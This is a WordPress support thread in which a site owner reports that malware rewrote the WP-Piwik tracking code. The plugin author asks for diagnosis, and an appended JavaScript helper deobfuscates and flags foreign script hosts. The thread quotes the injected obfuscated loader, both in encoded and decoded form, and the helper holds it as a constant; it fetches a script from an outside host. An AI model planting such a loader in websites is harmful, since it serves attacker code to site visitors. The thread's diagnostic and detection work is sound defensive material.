• Hi,

    Not really sure if this is the right place, but I was hit by malware which modified my wp-piwik-tracking_code to load code from another site.

    My versions (WordPress and WP-Piwik) weren't up to date, so I'm guilty, but I think I'm not alone in this case.

    wp-piwik-tracking_code was modified to:
    <script>var sc = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); sc.src=String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 106, 97, 114, 46, 116, 114, 97, 102, 102, 105, 99, 98, 101, 116, 116, 101, 114, 46, 98, 105, 122, 47, 115, 46, 106, 115); sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); document.getElementsByTagName(String.fromCharCode(104, 101, 97, 100))[0].appendChild(sc);</script>

    which can be decoded to:
    var sc = document.createElement("script"); sc.type = "text/javascript"; sc.src = "https://jar.trafficbetter.biz/s.js"; document.head.appendChild(sc);

    Regards,

Viewing 1 replies (of 1 total)
  • Plugin Author braekling (@braekling)

    Did you also check your Piwik setup? Does Piwik itself deliver the malformed tracking code (so the attacker used Piwik), or was it injected directly into WordPress or via WP-Piwik?

    You can test Piwik's API response by executing:
    {PIWIK_URL}?module=API&method=SitesManager.getJavascriptTag&idSite={SITE_ID}&piwikUrl=&format=xml&token_auth={AUTH_TOKEN}
    and:
    {PIWIK_URL}?module=API&method=SitesManager.getImageTrackingCode&idSite={SITE_ID}&piwikUrl=&format=xml&token_auth={AUTH_TOKEN}

    This issue was reported 3-4 times in the last few months, but no reporter ever gave feedback on how the attacker intruded. Currently, there are no known vulnerabilities in Piwik or WP-Piwik, and without further information we also have no chance to test this in more detail. See also: https://github.com/braekling/WP-Matomo/issues/66

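The triage braekling asks for (is the foreign loader in the WordPress-side snippet, or does Piwik's own API hand it out?) can be scripted. The following is an added example for this thread, not code from the WP-Piwik or Piwik projects: it decodes the String.fromCharCode obfuscation shown in the opening post, lists every absolute URL quoted in a tracking snippet, and flags any host that is not on an allow-list. The same check runs on the snippet stored by WordPress and on the tag unwrapped from a SitesManager.getJavascriptTag response. The allow-list host analytics.example.com, the helper names, and the shape of the format=xml response (a constructed, entity-encoded `<result>` wrapper) are assumptions made here.

```javascript
// Added example for this thread (not WP-Piwik or Piwik code): triage helper for
// a tracking snippet that may carry an obfuscated third-party script loader.

// Replace each String.fromCharCode(n, n, ...) call with the string it builds.
function deobfuscateCharCodes(snippet) {
  return snippet.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_match, list) => {
    const text = list.split(",").map(n => String.fromCharCode(Number(n.trim()))).join("");
    return JSON.stringify(text); // double-quoted literal, so the result stays valid JS
  });
}

// Every absolute or protocol-relative URL that appears inside a quoted string.
function extractQuotedUrls(snippet) {
  const re = /["']((?:https?:)?\/\/[^"'\s]+)["']/g;
  const urls = new Set();
  let m;
  while ((m = re.exec(snippet)) !== null) urls.add(m[1]);
  return [...urls];
}

// URLs whose host is not on the allow-list. The snippet is decoded first so an
// obfuscated loader cannot hide its host; unparsable URLs are reported as well.
function findForeignUrls(snippet, allowedHosts) {
  const decoded = deobfuscateCharCodes(snippet);
  return extractQuotedUrls(decoded).filter(url => {
    try {
      return !allowedHosts.includes(new URL(url, "https://placeholder.invalid/").hostname);
    } catch (_err) {
      return true;
    }
  });
}

// Unwrap the tag from a format=xml response: assumed shape is <result>...</result>
// with the HTML entity-encoded (CDATA is accepted too). "&amp;" is decoded last so
// that "&amp;lt;" does not turn into "<".
function trackingTagFromPiwikXml(xml) {
  const m = /<result>([\s\S]*?)<\/result>/.exec(xml);
  if (!m) return "";
  return m[1]
    .replace(/<!\[CDATA\[([\s\S]*?)\]\]>/g, "$1")
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&#0?39;/g, "'")
    .replace(/&amp;/g, "&");
}

// Hosts the site legitimately loads tracking code from (assumed for the example).
const ALLOWED_HOSTS = ["analytics.example.com"];

// The injected snippet quoted in the opening post.
const INJECTED_OPTION = '<script>var sc = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); sc.src=String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 106, 97, 114, 46, 116, 114, 97, 102, 102, 105, 99, 98, 101, 116, 116, 101, 114, 46, 98, 105, 122, 47, 115, 46, 106, 115); sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); document.getElementsByTagName(String.fromCharCode(104, 101, 97, 100))[0].appendChild(sc);</script>';

// Constructed stand-in for a clean SitesManager.getJavascriptTag response.
const CLEAN_PIWIK_XML = `<?xml version="1.0" encoding="utf-8" ?>
<result>&lt;!-- Piwik --&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
  var _paq = _paq || [];
  _paq.push([&#039;trackPageView&#039;]);
  (function() {
    var u=&quot;//analytics.example.com/&quot;;
    _paq.push([&#039;setTrackerUrl&#039;, u+&#039;piwik.php&#039;]);
    var d=document, g=d.createElement(&#039;script&#039;), s=d.getElementsByTagName(&#039;script&#039;)[0];
    g.type=&#039;text/javascript&#039;; g.async=true; g.src=u+&#039;piwik.js&#039;; s.parentNode.insertBefore(g,s);
  })();
&lt;/script&gt;
&lt;!-- End Piwik Code --&gt;</result>`;

// Run both checks; a foreign URL only on the WordPress side points at an
// injection into WordPress/WP-Piwik rather than a compromised Piwik.
function triage() {
  return {
    wordpressOption: findForeignUrls(INJECTED_OPTION, ALLOWED_HOSTS),
    piwikApi: findForeignUrls(trackingTagFromPiwikXml(CLEAN_PIWIK_XML), ALLOWED_HOSTS),
  };
}

console.log(deobfuscateCharCodes(INJECTED_OPTION));
console.log(triage());
```

On a real install, feed findForeignUrls the snippet value from the WordPress database and the bodies returned by the two API URLs above (the getImageTrackingCode response goes through the same unwrapper); a clean API response next to a flagged WordPress snippet means the change happened on the WordPress side, which is the distinction braekling is asking about.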

The topic ‘wp-piwik-tracking_code : malicious code’ is closed to new replies.